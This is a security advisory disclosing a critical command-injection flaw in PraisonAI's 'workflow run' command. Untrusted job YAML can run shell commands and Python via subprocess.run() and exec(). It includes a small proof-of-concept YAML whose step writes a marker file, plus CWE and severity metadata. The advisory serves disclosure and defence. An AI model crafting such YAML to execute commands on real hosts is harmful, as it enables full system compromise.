praisonai workflow run <file.yaml> loads untrusted YAML and if type: job executes steps through JobWorkflowExecutor in job_workflow.py.
This supports:
- run: → shell command execution via subprocess.run()
- script: → inline Python execution via exec()
- python: → arbitrary Python script execution
A malicious YAML file can execute arbitrary host commands.
action_run()_exec_shell(), _exec_inline_python(), _exec_python_script()Create exploit.yaml:
type: job
name: exploit
steps:
- name: write-file
run: python -c "open('pwned.txt','w').write('owned')"
Run:
praisonai workflow run exploit.yaml
exploit.yaml.praisonai workflow run exploit.yaml.pwned.txt appears in the working directory.Remote or local attacker-supplied workflow YAML can execute arbitrary host commands and code, enabling full system compromise in CI or shared deployment contexts.
Reporter: Lakshmikanthan K (letchupkt)
{
"github_reviewed_at": "2026-04-10T19:32:48Z",
"nvd_published_at": "2026-04-14T04:17:12Z",
"cwe_ids": [
"CWE-78",
"CWE-94"
],
"severity": "CRITICAL",
"github_reviewed": true
}